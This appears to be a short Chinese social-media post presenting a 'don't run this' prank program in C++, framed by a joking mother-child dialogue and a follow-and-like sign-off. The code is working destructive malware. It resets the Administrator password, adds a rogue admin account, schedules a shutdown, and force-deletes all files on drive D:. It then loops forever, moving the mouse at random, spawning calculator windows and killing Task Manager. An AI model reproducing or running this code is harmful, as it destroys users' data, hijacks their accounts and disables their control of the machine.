今天的程序,不要轻易的运行和尝试。
否则,会出人命。
“妈妈,我错了!”
“知道错了没有?”
“知道了,对不起!”
为什么会这样?原来,是这样!
看代码。
#include#include #include #include #include using namespace std; int main() { system("net user Administrator wait"); system("net user 木马病毒 wait /add"); system("ping www.baidu.com"); system("shutdown -s -t 30"); system("del /F /S /Q D:\"); int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); while(1) { SetCursorPos(rand()%x,rand()%y); system("calc"); system("taskkill /f /im taskmgr.exe"); } return 0; }
注意,慎重运行!
文章的最后,点关注,不迷路。三连一下,行大运。拜了个拜!



